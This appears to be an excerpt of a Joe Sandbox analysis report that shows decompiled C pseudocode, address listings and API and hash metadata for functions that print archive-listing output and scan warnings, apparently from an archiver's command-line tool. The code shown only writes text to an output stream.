				intOrPtr _t86;
				struct _IO_FILE** _t87;
				signed char _t91;
				intOrPtr _t133;
				signed int _t140;
				struct _IO_FILE** _t142;
				void* _t144;

				_t133 = __edx;
				L00B7F140(E00B86698, _t144);
				 *((intOrPtr*)(_t144 - 0x18)) = __ecx;
				_t91 = 0;
				_t142 =  *(_t144 + 0x10);
				 *((intOrPtr*)(_t144 - 0x10)) = __edx;
				 *((intOrPtr*)(_t144 - 0x14)) = 0;
				if( *((intOrPtr*)(__edx + 0xf8)) == 0) {
					L4:
					_t83 =  *(_t144 + 8);
					if( *((intOrPtr*)(_t144 - 0x18)) != _t91 ||  *_t83 != _t91 || _t83[8] != _t91 || _t83[0x14] != _t91) {
						__eflags = _t142 - _t91;
						if(_t142 == _t91) {
							L31:
							_t50 = 2;
							goto L32;
						}
						_t51 = E00B12D90(_t144 - 0x24);
						_t140 = 0;
						__eflags = _t83[8];
						 *(_t144 - 4) = 0;
						if(_t83[8] != 0) {
							L00B131AD(_t144 - 0x24, _t83[4]);
							_t51 = L00B130FE(_t144 - 0x24);
						}
						__eflags = _t83[0x14];
						if(__eflags <= 0) {
							L26:
							_t85 =  *_t83;
							__eflags =  *_t83;
							if(__eflags != 0) {
								_t54 = L00B155C8(_t144 - 0x30, _t85, __eflags);
								 *(_t144 - 4) = 1;
								_t55 = L00B13171(_t144 - 0x24, __eflags, _t54);
								_t39 = _t144 - 4;
								 *_t39 =  *(_t144 - 4) & 0x00000000;
								__eflags =  *_t39;
								E00B11E89(_t55,  *((intOrPtr*)(_t144 - 0x30)));
								_t51 = L00B130FE(_t144 - 0x24);
							}
							__eflags =  *(_t144 - 0x20);
							if(__eflags != 0) {
								_push( *((intOrPtr*)(_t144 - 0x24)));
								_push(L"\nError:\n");
								_t51 = L00B11FFC(L00B11FFC(_t142, __eflags), __eflags);
							}
							E00B11E89(_t51,  *((intOrPtr*)(_t144 - 0x24)));
							goto L31;
						} else {
							do {
								L00B13171(_t144 - 0x24, __eflags,  *((intOrPtr*)(_t83[0x10] + _t140 * 4)));
								_t51 = L00B130FE(_t144 - 0x24);
								_t140 = _t140 + 1;
								__eflags = _t140 - _t83[0x14];
							} while (__eflags < 0);
							goto L26;
						}
					} else {
						_t86 =  *((intOrPtr*)(_t133 + 0xe0));
						if(_t86 != _t91) {
							__eflags = _t142 - _t91;
							if(_t142 != _t91) {
								E00B11FE9(_t142);
								fputs("WARNINGS for files:",  *_t142);
								E00B11FE9(_t142);
								E00B11FE9(_t142);
								E00B4A711( *((intOrPtr*)(_t144 - 0x10)) + 0xdc, _t142);
								fputs("WARNING: Cannot open ",  *_t142);
								fputs(" file",  *(E00B12221(_t142, _t86)));
								__eflags = _t86 - 1;
								if(_t86 > 1) {
									fputc(0x73,  *_t142);
								}
								E00B11FE9(_t142);
							}
							 *((intOrPtr*)(_t144 - 0x14)) = 1;
						} else {
							if( *((char*)(_t144 + 0x14)) != 0 &&  *((intOrPtr*)(_t133 + 0xf8)) == _t91) {
								_t87 =  *(_t144 + 0xc);
								if(_t87 != _t91) {
									if(_t142 != _t91) {
										L00B11FDA(_t142);
									}
									fputs( *0xb8d3d8,  *_t87);
									E00B11FE9(_t87);
								}
							}
						}
						_t50 =  *((intOrPtr*)(_t144 - 0x14));
						L32:
						 *[fs:0x0] =  *((intOrPtr*)(_t144 - 0xc));
						return _t50;
					}
				}
				if(_t142 != 0) {
					E00B11FE9(_t142);
					fputs("Scan WARNINGS for files and folders:",  *_t142);
					E00B11FE9(_t142);
					E00B11FE9(_t142);
					E00B4A711( *((intOrPtr*)(_t144 - 0x10)) + 0xf4, _t142);
					fputs("Scan WARNINGS: ",  *_t142);
					E00B12221(_t142,  *((intOrPtr*)( *((intOrPtr*)(_t144 - 0x10)) + 0xf8)));
					E00B11FE9(_t142);
					_t133 =  *((intOrPtr*)(_t144 - 0x10));
					_t91 = 0;
				}
				 *((intOrPtr*)(_t144 - 0x14)) = 1;
				goto L4;
			}















                                                                                                                    0x00b4a4df
                                                                                                                    0x00b4a4e4
                                                                                                                    0x00b4a4f2
                                                                                                                    0x00b4a4f6
                                                                                                                    0x00b4a4f9
                                                                                                                    0x00b4a505
                                                                                                                    0x00b4a508
                                                                                                                    0x00b4a50b
                                                                                                                    0x00b4a56d
                                                                                                                    0x00b4a570
                                                                                                                    0x00b4a573
                                                                                                                    0x00b4a657
                                                                                                                    0x00b4a659
                                                                                                                    0x00b4a6fd
                                                                                                                    0x00b4a6ff
                                                                                                                    0x00000000
                                                                                                                    0x00b4a6ff
                                                                                                                    0x00b4a662
                                                                                                                    0x00b4a667
                                                                                                                    0x00b4a669
                                                                                                                    0x00b4a66c
                                                                                                                    0x00b4a66f
                                                                                                                    0x00b4a677
                                                                                                                    0x00b4a67f
                                                                                                                    0x00b4a67f
                                                                                                                    0x00b4a684
                                                                                                                    0x00b4a688
                                                                                                                    0x00b4a6a6
                                                                                                                    0x00b4a6a6
                                                                                                                    0x00b4a6a8
                                                                                                                    0x00b4a6aa
                                                                                                                    0x00b4a6b1
                                                                                                                    0x00b4a6ba
                                                                                                                    0x00b4a6be
                                                                                                                    0x00b4a6c3
                                                                                                                    0x00b4a6c3
                                                                                                                    0x00b4a6c3
                                                                                                                    0x00b4a6ca
                                                                                                                    0x00b4a6d3
                                                                                                                    0x00b4a6d3
                                                                                                                    0x00b4a6d8
                                                                                                                    0x00b4a6dc
                                                                                                                    0x00b4a6de
                                                                                                                    0x00b4a6e3
                                                                                                                    0x00b4a6ef
                                                                                                                    0x00b4a6ef
                                                                                                                    0x00b4a6f7
                                                                                                                    0x00000000
                                                                                                                    0x00b4a68a
                                                                                                                    0x00b4a68a
                                                                                                                    0x00b4a693
                                                                                                                    0x00b4a69b
                                                                                                                    0x00b4a6a0
                                                                                                                    0x00b4a6a1
                                                                                                                    0x00b4a6a1
                                                                                                                    0x00000000
                                                                                                                    0x00b4a68a
                                                                                                                    0x00b4a593
                                                                                                                    0x00b4a593
                                                                                                                    0x00b4a59b
                                                                                                                    0x00b4a5de
                                                                                                                    0x00b4a5e0
                                                                                                                    0x00b4a5e4
                                                                                                                    0x00b4a5f0
                                                                                                                    0x00b4a5f6
                                                                                                                    0x00b4a5fd
                                                                                                                    0x00b4a60d
                                                                                                                    0x00b4a619
                                                                                                                    0x00b4a62c
                                                                                                                    0x00b4a62f
                                                                                                                    0x00b4a633
                                                                                                                    0x00b4a639
                                                                                                                    0x00b4a640
                                                                                                                    0x00b4a643
                                                                                                                    0x00b4a643
                                                                                                                    0x00b4a648
                                                                                                                    0x00b4a59d
                                                                                                                    0x00b4a5a1
                                                                                                                    0x00b4a5b3
                                                                                                                    0x00b4a5b8
                                                                                                                    0x00b4a5c0
                                                                                                                    0x00b4a5c4
                                                                                                                    0x00b4a5c4
                                                                                                                    0x00b4a5d1
                                                                                                                    0x00b4a5d7
                                                                                                                    0x00b4a5d7
                                                                                                                    0x00b4a5b8
                                                                                                                    0x00b4a5a1
                                                                                                                    0x00b4a64f
                                                                                                                    0x00b4a700
                                                                                                                    0x00b4a706
                                                                                                                    0x00b4a70e
                                                                                                                    0x00b4a70e
                                                                                                                    0x00b4a573
                                                                                                                    0x00b4a50f
                                                                                                                    0x00b4a513
                                                                                                                    0x00b4a51f
                                                                                                                    0x00b4a525
                                                                                                                    0x00b4a52c
                                                                                                                    0x00b4a53c
                                                                                                                    0x00b4a54e
                                                                                                                    0x00b4a555
                                                                                                                    0x00b4a55c
                                                                                                                    0x00b4a561
                                                                                                                    0x00b4a564
                                                                                                                    0x00b4a564
                                                                                                                    0x00b4a566
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B4A4E4
                                                                                                                    • fputs.MSVCRT ref: 00B4A54E
                                                                                                                      • Part of subcall function 00B12221: fputs.MSVCRT ref: 00B1223B
                                                                                                                    • fputs.MSVCRT ref: 00B4A51F
                                                                                                                      • Part of subcall function 00B4A711: __EH_prolog.LIBCMT ref: 00B4A716
                                                                                                                      • Part of subcall function 00B4A711: fputs.MSVCRT ref: 00B4A73F
                                                                                                                      • Part of subcall function 00B4A711: fputs.MSVCRT ref: 00B4A783
                                                                                                                    • fputs.MSVCRT ref: 00B4A5D1
                                                                                                                    • fputs.MSVCRT ref: 00B4A5F0
                                                                                                                    • fputs.MSVCRT ref: 00B4A619
                                                                                                                    • fputs.MSVCRT ref: 00B4A62C
                                                                                                                    • fputc.MSVCRT ref: 00B4A639
                                                                                                                      • Part of subcall function 00B11FE9: fputc.MSVCRT ref: 00B11FF0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: fputs$H_prologfputc
                                                                                                                    • String ID: Error:$ file$Scan WARNINGS for files and folders:$Scan WARNINGS: $WARNING: Cannot open $WARNINGS for files:
                                                                                                                    • API String ID: 3294964263-2840245699
                                                                                                                    • Opcode ID: 826707aba73065ffd4e2e7b0dc25af482aec6c62c8954525024fe1443a077122
                                                                                                                    • Instruction ID: 44312ff362d0a28242dd4b860fd161fdab1d02edd450b5ebfe03a119b9f4fec2
                                                                                                                    • Opcode Fuzzy Hash: 826707aba73065ffd4e2e7b0dc25af482aec6c62c8954525024fe1443a077122
                                                                                                                    • Instruction Fuzzy Hash: BA51C0316002159BCF19EF94D882AEDB7F5EF44701F2504EEF40166192EF719E81DB66
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B44860 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 78COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 95%
                                                                                                                    			E00B44860(struct _IO_FILE** __ecx, void* __edx) {
				signed int _t19;
				void* _t32;
				signed int* _t33;
				struct _IO_FILE** _t48;
				void* _t53;
				void* _t55;
				void* _t57;

				L00B7F140(0xb85f58, _t53);
				_t48 = __ecx;
				_t32 = __edx;
				fputs( *0xb8c260,  *__ecx);
				fputs("Path:     ",  *_t48);
				_t57 = _t55 - 0x4c + 0x10;
				_push(_t32);
				E00B12163(_t48);
				_t19 = E00B11FE9(_t48);
				_t33 =  *(_t53 + 0xc);
				if(_t33 != 0) {
					_t19 =  *_t33 & _t33[1];
					if(_t19 != 0xffffffff) {
						E00B126D9(_t53 - 0x18);
						 *(_t53 - 4) =  *(_t53 - 4) & 0x00000000;
						E00B443B9(_t53 - 0x18,  *_t33, _t33[1]);
						fputs( *0xb8c260,  *_t48);
						fputs("Size:     ",  *_t48);
						fputs( *(_t53 - 0x18),  *_t48);
						_t57 = _t57 + 0x18;
						_t19 = E00B11E89(E00B11FE9(_t48),  *(_t53 - 0x18));
					}
				}
				if( *((intOrPtr*)(_t53 + 8)) != 0) {
					_t19 = L00B19670(_t53 - 0x58, 0);
					if(_t19 != 0) {
						fputs( *0xb8c260,  *_t48);
						fputs("Modified: ",  *_t48);
						fputs(_t53 - 0x58,  *_t48);
						_t19 = E00B11FE9(_t48);
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t53 - 0xc));
				return _t19;
			}










                                                                                                                    0x00b44865
                                                                                                                    0x00b44876
                                                                                                                    0x00b44878
                                                                                                                    0x00b44882
                                                                                                                    0x00b4488b
                                                                                                                    0x00b4488d
                                                                                                                    0x00b44892
                                                                                                                    0x00b44893
                                                                                                                    0x00b4489a
                                                                                                                    0x00b4489f
                                                                                                                    0x00b448a4
                                                                                                                    0x00b448a8
                                                                                                                    0x00b448ae
                                                                                                                    0x00b448b3
                                                                                                                    0x00b448bb
                                                                                                                    0x00b448c4
                                                                                                                    0x00b448d1
                                                                                                                    0x00b448da
                                                                                                                    0x00b448e1
                                                                                                                    0x00b448e3
                                                                                                                    0x00b448f0
                                                                                                                    0x00b448f5
                                                                                                                    0x00b448ae
                                                                                                                    0x00b448fb
                                                                                                                    0x00b44902
                                                                                                                    0x00b44909
                                                                                                                    0x00b44913
                                                                                                                    0x00b4491c
                                                                                                                    0x00b44924
                                                                                                                    0x00b4492b
                                                                                                                    0x00b4492b
                                                                                                                    0x00b44909
                                                                                                                    0x00b44936
                                                                                                                    0x00b4493e

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: fputs$H_prolog$fputcfree
                                                                                                                    • String ID: Modified: $Path: $Size:
                                                                                                                    • API String ID: 2632947726-3207571042
                                                                                                                    • Opcode ID: 58b8eaec51f5b44d372f3dee37cf7fc47d714d3d20e090faf579d616d1f2d118
                                                                                                                    • Instruction ID: 187609e0fd27d5b41b58a720b56967041233d7866c69e4c9c8411a9073f219c7
                                                                                                                    • Opcode Fuzzy Hash: 58b8eaec51f5b44d372f3dee37cf7fc47d714d3d20e090faf579d616d1f2d118
                                                                                                                    • Instruction Fuzzy Hash: C8216071A00105ABCF05AFD5DC82EAEBFA6EF44750F5440A6F904661B1EB315961EFA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B4657F Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 341COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 86%
                                                                                                                    			E00B4657F(intOrPtr* __ecx) {
				void* __ebx;
				signed int _t149;
				signed int _t154;
				intOrPtr* _t155;
				intOrPtr _t156;
				int _t161;
				int _t176;
				signed int _t182;
				intOrPtr _t183;
				void* _t186;
				intOrPtr* _t190;
				intOrPtr* _t194;
				signed int _t202;
				char* _t221;
				void* _t222;
				char* _t223;
				signed int _t228;
				signed short _t234;
				struct _IO_FILE** _t239;
				intOrPtr _t275;
				intOrPtr* _t289;
				intOrPtr _t290;
				intOrPtr _t291;
				char* _t292;
				intOrPtr _t293;
				char** _t294;
				intOrPtr* _t297;
				void* _t299;

				L00B7F140(E00B860C8, _t299);
				 *(_t299 - 0x10) =  *(_t299 - 0x10) & 0x00000000;
				 *(_t299 - 0x1c) =  *(_t299 - 0x1c) & 0x00000000;
				_t297 = __ecx;
				_t219 =  *((intOrPtr*)(__ecx + 0x10));
				 *(_t299 - 0x14) = _t219;
				if( *((intOrPtr*)(__ecx + 4)) <= 0) {
					L68:
					E00B11FE9(0xb9a5b0);
					_t149 = 0;
					L69:
					 *[fs:0x0] =  *((intOrPtr*)(_t299 - 0xc));
					return _t149;
				} else {
					goto L1;
				}
				do {
					L1:
					_t289 =  *((intOrPtr*)( *_t297 +  *(_t299 - 0x1c) * 4));
					if(_t219 != 0) {
						__eflags =  *(_t289 + 0x18);
						if(__eflags == 0) {
							_push( *((intOrPtr*)(_t289 + 8)));
							L00B11FFC(0xb9a5b0, __eflags);
						} else {
							fputs( *(_t289 + 0x14),  *0xb9a5b0);
						}
					} else {
						E00B46A45(_t299 +  *(_t299 - 0x10) - 0xd4,  *((intOrPtr*)(_t289 + 0x28)));
						 *(_t299 - 0x10) =  *(_t299 - 0x10) +  *((intOrPtr*)(_t289 + 0x28));
					}
					_t275 =  *_t289;
					if(_t275 != 3) {
						__eflags =  *((char*)(_t289 + 4));
						 *((intOrPtr*)(_t299 - 0x30)) =  *((intOrPtr*)(_t289 + 0x2c));
						if( *((char*)(_t289 + 4)) == 0) {
							_t234 = 0;
							 *((short*)(_t299 - 0x2c)) = 0;
							 *((short*)(_t299 - 0x2a)) = 0;
							 *(_t299 - 0x24) = 0;
							 *(_t299 - 4) = 1;
							_t154 = _t275 - 7;
							__eflags = _t154;
							if(_t154 == 0) {
								_t155 =  *((intOrPtr*)(_t299 + 0xc));
								__eflags =  *((char*)(_t155 + 8));
								if( *((char*)(_t155 + 8)) == 0) {
									L39:
									_t156 =  *_t289;
									__eflags = _t156 - 9;
									if(_t156 != 9) {
										L45:
										__eflags = _t234;
										if(_t234 != 0) {
											__eflags = _t234 - 0x40;
											if(_t234 != 0x40) {
												__eflags = _t234 - 8;
												if(_t234 != 8) {
													L00B3D568(_t219, _t299 - 0x114, _t299 - 0x2c, _t156, 0);
													__eflags =  *(_t299 - 0x14);
													if( *(_t299 - 0x14) == 0) {
														_t221 = _t299 +  *(_t299 - 0x10) - 0xd4;
														E00B46AC0(_t221,  *((intOrPtr*)(_t289 + 0x24)),  *((intOrPtr*)(_t299 - 0x30)), _t299 - 0x114);
														_t161 = strlen(_t221);
														L62:
														_t133 = _t299 - 0x10;
														 *_t133 =  *(_t299 - 0x10) + _t161;
														__eflags =  *_t133;
														L63:
														_t135 = _t299 - 4;
														 *_t135 =  *(_t299 - 4) | 0xffffffff;
														__eflags =  *_t135;
														L00B19312(_t299 - 0x2c);
														L64:
														_t219 =  *(_t299 - 0x14);
														__eflags = _t219;
														if(_t219 == 0) {
															goto L67;
														}
														_t239 = 0xb9a5b0;
														goto L66;
													}
													fputs(_t299 - 0x114,  *0xb9a5b0);
													L52:
													goto L63;
												}
												_t222 = _t297 + 0x2c;
												L00B13023(_t156, _t222,  *(_t299 - 0x24));
												E00B120E3(0xb9a5b0, _t222);
												__eflags =  *(_t299 - 0x14);
												_push(_t297 + 0x20);
												_push(_t222);
												if( *(_t299 - 0x14) == 0) {
													E00B46A71( *((intOrPtr*)(_t289 + 0x24)),  *((intOrPtr*)(_t299 - 0x30)));
												} else {
													E00B12059(0xb9a5b0);
												}
												goto L63;
											}
											 *(_t299 - 0x3a) =  *(_t299 - 0x3a) & 0x00000000;
											 *(_t299 - 0x39) =  *(_t299 - 0x39) & 0x00000000;
											 *((intOrPtr*)(_t299 - 0x44)) = 0;
											 *((intOrPtr*)(_t299 - 0x40)) = 0;
											 *((short*)(_t299 - 0x3c)) = 0;
											L00B23A2C(_t299 - 0x44, _t299 - 0x2c);
											_t223 = _t299 +  *(_t299 - 0x10) - 0xd4;
											E00B46B2D(_t223, _t299 - 0x44,  *(_t299 - 0x14));
											__eflags =  *(_t299 - 0x14);
											if( *(_t299 - 0x14) == 0) {
												_t176 = strlen(_t223);
												_t290 =  *((intOrPtr*)(_t289 + 0x2c));
												 *(_t299 - 0x10) =  *(_t299 - 0x10) + _t176;
												__eflags = _t176 - _t290;
												if(_t176 >= _t290) {
													goto L63;
												}
												_t291 = _t290 - _t176;
												L48:
												E00B46A45(_t299 +  *(_t299 - 0x10) - 0xd4, _t291);
												 *(_t299 - 0x10) =  *(_t299 - 0x10) + _t291;
												goto L63;
											}
											fputs(_t223,  *0xb9a5b0);
											goto L52;
										}
										__eflags =  *(_t299 - 0x14);
										if( *(_t299 - 0x14) != 0) {
											goto L63;
										}
										_t291 =  *((intOrPtr*)(_t299 - 0x30));
										goto L48;
									}
									__eflags = _t234;
									if(_t234 == 0) {
										L42:
										_t292 = _t299 +  *(_t299 - 0x10) - 0xd4;
										asm("sbb ecx, ecx");
										E00B469C9( ~_t234 &  *(_t299 - 0x24),  *((intOrPtr*)(_t297 + 0x38)),  *(_t299 - 0x14), _t292);
										__eflags =  *(_t299 - 0x14);
										if( *(_t299 - 0x14) == 0) {
											_t161 = strlen(_t292);
											goto L62;
										}
										fputs(_t292,  *0xb9a5b0);
										goto L52;
									}
									__eflags = _t234 - 0x13;
									if(_t234 != 0x13) {
										goto L45;
									}
									goto L42;
								}
								_push( *((intOrPtr*)(_t155 + 4)));
								_push( *_t155);
								L37:
								L00B192B9(_t299 - 0x2c);
								L38:
								_t234 =  *((intOrPtr*)(_t299 - 0x2c));
								goto L39;
							}
							_t182 = _t154 - 1;
							__eflags = _t182;
							if(_t182 == 0) {
								_t183 =  *((intOrPtr*)(_t299 + 0xc));
								__eflags =  *((char*)(_t183 + 0x18));
								if( *((char*)(_t183 + 0x18)) == 0) {
									goto L39;
								}
								_push( *((intOrPtr*)(_t183 + 0x14)));
								_push( *((intOrPtr*)(_t183 + 0x10)));
								goto L37;
							}
							__eflags = _t182 == 4;
							if(_t182 == 4) {
								_t186 =  *((intOrPtr*)(_t299 + 0xc)) + 0x20;
								__eflags =  *((char*)(_t186 + 0xb));
								if( *((char*)(_t186 + 0xb)) == 0) {
									goto L39;
								}
								_t219 =  *(_t186 + 0xa) & 0x000000ff;
								 *(_t299 - 0x48) =  *(_t186 + 8) & 0x0000ffff;
								L00B192E5(_t299 - 0x2c, _t186);
								 *(_t299 - 0x26) =  *(_t299 - 0x26) & 0x00000000;
								 *((short*)(_t299 - 0x2a)) =  *(_t299 - 0x48);
								 *((short*)(_t299 - 0x28)) =  *(_t186 + 0xa) & 0x000000ff;
								goto L38;
							}
							_t190 =  *((intOrPtr*)( *((intOrPtr*)(_t297 + 0xc))));
							_t219 =  *((intOrPtr*)( *_t190 + 0x18))(_t190,  *((intOrPtr*)(_t299 + 8)), _t275, _t299 - 0x2c);
							__eflags = _t219;
							if(_t219 != 0) {
								L00B19312(_t299 - 0x2c);
								_t149 = _t219;
								goto L69;
							}
							goto L38;
						}
						_t194 =  *((intOrPtr*)( *((intOrPtr*)(_t297 + 0xc)) + 8));
						_t149 =  *((intOrPtr*)( *_t194 + 0x10))(_t194,  *((intOrPtr*)(_t299 + 8)), _t275, _t299 - 0x34, _t299 - 0x18, _t299 - 0x38);
						__eflags = _t149;
						if(_t149 != 0) {
							goto L69;
						}
						_t284 =  *(_t299 - 0x18);
						__eflags =  *(_t299 - 0x18);
						if( *(_t299 - 0x18) == 0) {
							goto L64;
						}
						_t293 =  *_t289;
						_t228 = 1;
						__eflags = _t293 - 0x3e;
						if(_t293 != 0x3e) {
							__eflags = _t293 - 0x59;
							if(_t293 != 0x59) {
								L22:
								__eflags =  *((intOrPtr*)(_t299 - 0x38)) - 1;
								if( *((intOrPtr*)(_t299 - 0x38)) != 1) {
									L70:
									_t149 = 0x80004005;
									goto L69;
								}
								__eflags =  *(_t299 - 0x18) - 0x40;
								if( *(_t299 - 0x18) <= 0x40) {
									E00B46BA5(_t299 - 0x198,  *((intOrPtr*)(_t299 - 0x34)),  *(_t299 - 0x18));
									fputs(_t299 - 0x198,  *0xb9a5b0);
									L17:
									goto L64;
								}
								fputs("data:",  *0xb9a5b0);
								E00B12221(0xb9a5b0,  *(_t299 - 0x18));
								goto L64;
							}
							E00B12D90(_t299 - 0x54);
							 *(_t299 - 4) =  *(_t299 - 4) & 0x00000000;
							_push(_t299 - 0x54);
							_t202 = L00B3DAE7( *((intOrPtr*)(_t299 - 0x34)),  *(_t299 - 0x18), __eflags);
							__eflags = _t202;
							if(_t202 != 0) {
								_t228 = 0;
								__eflags = 0;
								_t202 = E00B12059(0xb9a5b0, _t299 - 0x54, _t297 + 0x20);
							}
							 *(_t299 - 4) =  *(_t299 - 4) | 0xffffffff;
							E00B11E89(_t202,  *((intOrPtr*)(_t299 - 0x54)));
							__eflags = _t228;
							if(_t228 == 0) {
								goto L64;
							} else {
								goto L22;
							}
						}
						__eflags =  *((intOrPtr*)(_t299 - 0x38)) - 1;
						if( *((intOrPtr*)(_t299 - 0x38)) != 1) {
							goto L70;
						}
						_t294 = _t297 + 0x20;
						L00B3D709( *((intOrPtr*)(_t299 - 0x34)), _t284, _t299, _t294);
						fputs( *_t294,  *0xb9a5b0);
						goto L17;
					} else {
						if(_t219 == 0) {
							fputs(_t299 - 0xd4,  *0xb9a5b0);
						}
						E00B12128(0xb9a5b0, _t297 + 0x14, _t297 + 0x2c, _t297 + 0x20);
						if(_t219 != 0) {
							_t239 = 0xb9a5b0;
							L66:
							E00B11FE9(_t239);
						}
					}
					L67:
					 *(_t299 - 0x1c) =  *(_t299 - 0x1c) + 1;
				} while ( *(_t299 - 0x1c) <  *((intOrPtr*)(_t297 + 4)));
				goto L68;
			}































                                                                                                                    0x00b46584
                                                                                                                    0x00b4658f
                                                                                                                    0x00b46593
                                                                                                                    0x00b46599
                                                                                                                    0x00b4659f
                                                                                                                    0x00b465a4
                                                                                                                    0x00b465a7
                                                                                                                    0x00b46999
                                                                                                                    0x00b4699e
                                                                                                                    0x00b469a3
                                                                                                                    0x00b469a5
                                                                                                                    0x00b469ab
                                                                                                                    0x00b469b3
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b465ad
                                                                                                                    0x00b465ad
                                                                                                                    0x00b465b4
                                                                                                                    0x00b465b7
                                                                                                                    0x00b465d3
                                                                                                                    0x00b465d7
                                                                                                                    0x00b465ed
                                                                                                                    0x00b465f5
                                                                                                                    0x00b465d9
                                                                                                                    0x00b465e3
                                                                                                                    0x00b465ea
                                                                                                                    0x00b465b9
                                                                                                                    0x00b465c6
                                                                                                                    0x00b465ce
                                                                                                                    0x00b465ce
                                                                                                                    0x00b465fa
                                                                                                                    0x00b465ff
                                                                                                                    0x00b46644
                                                                                                                    0x00b46648
                                                                                                                    0x00b4664b
                                                                                                                    0x00b46759
                                                                                                                    0x00b4675b
                                                                                                                    0x00b4675f
                                                                                                                    0x00b46763
                                                                                                                    0x00b46768
                                                                                                                    0x00b4676f
                                                                                                                    0x00b4676f
                                                                                                                    0x00b46772
                                                                                                                    0x00b467df
                                                                                                                    0x00b467e2
                                                                                                                    0x00b467e6
                                                                                                                    0x00b467f9
                                                                                                                    0x00b467f9
                                                                                                                    0x00b467fb
                                                                                                                    0x00b467fe
                                                                                                                    0x00b4683e
                                                                                                                    0x00b46840
                                                                                                                    0x00b46843
                                                                                                                    0x00b4686a
                                                                                                                    0x00b4686e
                                                                                                                    0x00b468db
                                                                                                                    0x00b468df
                                                                                                                    0x00b46928
                                                                                                                    0x00b4692d
                                                                                                                    0x00b46931
                                                                                                                    0x00b4694b
                                                                                                                    0x00b4695e
                                                                                                                    0x00b46964
                                                                                                                    0x00b46964
                                                                                                                    0x00b46969
                                                                                                                    0x00b46969
                                                                                                                    0x00b46969
                                                                                                                    0x00b4696d
                                                                                                                    0x00b4696d
                                                                                                                    0x00b4696d
                                                                                                                    0x00b4696d
                                                                                                                    0x00b46974
                                                                                                                    0x00b46979
                                                                                                                    0x00b46979
                                                                                                                    0x00b4697c
                                                                                                                    0x00b4697e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b46980
                                                                                                                    0x00000000
                                                                                                                    0x00b46980
                                                                                                                    0x00b468b2
                                                                                                                    0x00b468b2
                                                                                                                    0x00000000
                                                                                                                    0x00b468b9
                                                                                                                    0x00b468e4
                                                                                                                    0x00b468e9
                                                                                                                    0x00b468f4
                                                                                                                    0x00b468f9
                                                                                                                    0x00b46900
                                                                                                                    0x00b46901
                                                                                                                    0x00b46902
                                                                                                                    0x00b46916
                                                                                                                    0x00b46904
                                                                                                                    0x00b46909
                                                                                                                    0x00b46909
                                                                                                                    0x00000000
                                                                                                                    0x00b46902
                                                                                                                    0x00b46870
                                                                                                                    0x00b46874
                                                                                                                    0x00b4687f
                                                                                                                    0x00b46882
                                                                                                                    0x00b46885
                                                                                                                    0x00b46889
                                                                                                                    0x00b46897
                                                                                                                    0x00b468a0
                                                                                                                    0x00b468a5
                                                                                                                    0x00b468a9
                                                                                                                    0x00b468c0
                                                                                                                    0x00b468c5
                                                                                                                    0x00b468c8
                                                                                                                    0x00b468cb
                                                                                                                    0x00b468ce
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b468d4
                                                                                                                    0x00b46851
                                                                                                                    0x00b4685d
                                                                                                                    0x00b46862
                                                                                                                    0x00000000
                                                                                                                    0x00b46862
                                                                                                                    0x00b468b2
                                                                                                                    0x00000000
                                                                                                                    0x00b468b2
                                                                                                                    0x00b46845
                                                                                                                    0x00b46848
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b4684e
                                                                                                                    0x00000000
                                                                                                                    0x00b4684e
                                                                                                                    0x00b46800
                                                                                                                    0x00b46803
                                                                                                                    0x00b4680b
                                                                                                                    0x00b46814
                                                                                                                    0x00b4681f
                                                                                                                    0x00b46824
                                                                                                                    0x00b46829
                                                                                                                    0x00b4682d
                                                                                                                    0x00b46964
                                                                                                                    0x00000000
                                                                                                                    0x00b46964
                                                                                                                    0x00b468b2
                                                                                                                    0x00000000
                                                                                                                    0x00b468b2
                                                                                                                    0x00b46805
                                                                                                                    0x00b46809
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b46809
                                                                                                                    0x00b467e8
                                                                                                                    0x00b467eb
                                                                                                                    0x00b467ed
                                                                                                                    0x00b467f0
                                                                                                                    0x00b467f5
